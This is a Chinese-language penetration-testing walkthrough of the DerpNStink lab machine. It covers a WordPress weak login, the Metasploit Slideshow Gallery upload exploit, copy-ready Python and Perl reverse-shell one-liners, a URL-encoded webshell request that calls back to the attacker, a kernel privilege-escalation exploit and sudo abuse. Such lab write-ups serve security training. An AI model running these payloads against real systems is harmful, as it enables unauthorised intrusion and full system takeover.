渗透测试靶机—DerpNStink
开启靶机,依旧登录框,平平无奇!
这里继续使用kali,nmap进行一波扫描
- 继续探测!
这里发现80端口,先访问一下网页:
- 页面没有什么信息,F12看看源代码
- 源代码中 直接存在一个flag,说明这个靶机flag应该是不止一个flag。这里有一个文件目录,看看访问结果
- 这是需要将hosts文件修改,更新本地的dns服务,修改完之后访问:http://derpnstink.local/
- 这里页面还是之前得到的页面,没有新的发现,目前也就只获取到一个flag
目录扫描
- 尝试目录扫描获取更多目录信息,这里扫描出一个phpmyadmin,还有一个后台,发现是WordPress站
- 这里优先处理后台,phpmyadmin应该可以尝试爆破,估计也能爆出账号密码
- 这里直接admin/admin 弱口令就能进,乐!
进入后台,这里又是WordPress站,可以直接用wpscan来扫一波,也可以用AWVS,由于wpscan目前是收费,需要注册,然后使用一些令牌什么的,所以AWVS还是更方便一些,这里直接扫出:WordPress Plugin Slideshow Gallery (1.6.4)
获取shell
这里已经知道WordPress Plugin Slideshow Gallery (1.6.4),那么就直接使用msf梭哈了
msfconsole
search Slideshow Gallery
use exploit/unix/webapp/wp_slideshowgallery_upload
set rhosts 192.168.217.147
set targeturi /weblog
set wp_user admin
set wp_password admin
run
这里是成功返回shell的!继续老步骤,反弹shell
先查看一波是否存在python
存在!那么就好处理了,直接使用老演员:python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.217.129",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
kali监听9999端口,执行命令就成功反弹回shell了
这里依旧老样子,执行代码获取伪shell,来获取一个交互式的tty
pwd发现当前目录,后台目录主要在weblog中,其中应该会存在一些敏感信息,这里直接ls,发现wp_config…文件
查看root的相关信息
发现mysql数据库信息,进入文件直接查看密码信息
尝试登录
成功!!!!
进入之后就是查看有关信息,这里直接找到users表,并且发现了用户名和一个密文的密码,知道了密文,那就是尝试爆破了
爆出密码,直接登录,发现flag
这里写着flag2
后台继续搜索信息,但是发现已经没有可利用的功能了,没有办法,只能往前看看,发现前面端口处还有21,和22端口
- 先尝试21,看看ftp
- 直接连接ftp,但是连接是需要账户密码的,到这里没有头绪了,翻看一些wp,查到这里shell是可以返回到/home目录下的,而在这个目录下是有两个账户的
- 这里直接使用这个用户名来登录,成功!
- 继续使用目前获取到的用户来进行信息收集,对ftp中的所有内容都查看一遍,其中在ssh中不断点击,发现了一个key.txt文件,下载到本地,查看
- 老思路了,这就是一个ssh的登录秘钥,可以使用这个登录秘钥,不需要登录密码登录ssh
- 这里登录成功之后就会发现在本地存在一个flag3
这里还有个小办法,那就是 直接在之前获取到的shell处直接尝试切换登录用户
提权
这里查看uname -a 直接搜索,发现poc,直接利用,在kali上开启python http服务,然后靶机shell下载这个文件执行,就能成功提权,最终获取root权限,发现flag
- 另一种办法:
- 这里可以在/home/stinky/Documents目录下枚举发现derpissues.pcap流量包文件!下载到本地kali枚举!
- 这里使用wireshark直接打开,进行分析
- 使用获取到的用户密码直接成功切换:
- 这里就需要sudo -l,写入覆盖其中的可执行文件
cd /home/mrderp
mkdir binaries
cd binaries
mv anger.sh derpy.sh
chmod +x serpy.sh
sudo ./derpy.sh
- 这里的anger.sh是前面自己创建的文件,主要是写入作用
- #!/bin/bash
bash -i
渗透过程中的其他办法:
- 34681的另一种提权exp
- 还有就是尝试34514漏洞
这里使用本地创建uploa.sh,通过执行exp来获取一个shell
然后直接访问http://derpnstink.local/weblog/wp-content/uploads/slideshow-gallery/cmd.php
这个时候已经成功上传了一个恶意文件,因为php文件是perl,那么就是用perl一句话来尝试连接
perl -e 'use Socket;$i="192.168.1.19";$p=6677;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
在本地开启监听
然后浏览器直接访问
http://derpnstink.local/weblog/wp-content/uploads/slideshow-gallery/cmd.php?cmd=perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.217.129%22%3B%24p%3D6666%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22%2Fbin%2Fsh%20-i%22%29%3B%7D%3B%27
注意这里需要修改本地自己ip以及监听的端口
这时候拿到了一个反弹shell!当然写入的php也可以是普通的一句话,用蚁剑连接就行的!
或者上传php-reverse-shell.php文件,然后直接访问反弹即可!
- 另外就是之前扫描出的phpmyadmin后台
- 尝试爆破,弱口令直接进入root/mysql
- 这里和之前的靶场一样,应该也可以直接写入后门
- 这里还直接装在user表中也读取到了9B776AFB479B31E8047026F1185E952DD1E530CB
- 后续也可以直接爆出密码